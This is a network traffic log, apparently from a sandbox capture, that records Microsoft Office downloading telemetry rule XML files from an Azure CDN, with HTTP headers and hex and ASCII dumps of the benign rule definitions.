                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:09:57 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DD08B87243495C"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T110957Z-1777c6cb754wcxkwhC1TEB3c6w0000000ay00000000078u3
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:57 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:58 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            2192.168.2.44974013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:59 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111000Z-178bfbc474bkvpdnhC1NYCuu2w00000001dg00000000agy8
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            3192.168.2.44974113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:59 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111000Z-r1d97b99577l6wbzhC1TEB3fwn0000000aag00000000aq7z
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            4192.168.2.44973913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:59 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111000Z-178bfbc474bgvl54hC1NYCsfuw00000001f00000000012gf
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            5192.168.2.44973813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:09:59 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111000Z-1777c6cb754gc8g6hC1TEB966c0000000ayg00000000bx5e
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:00 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
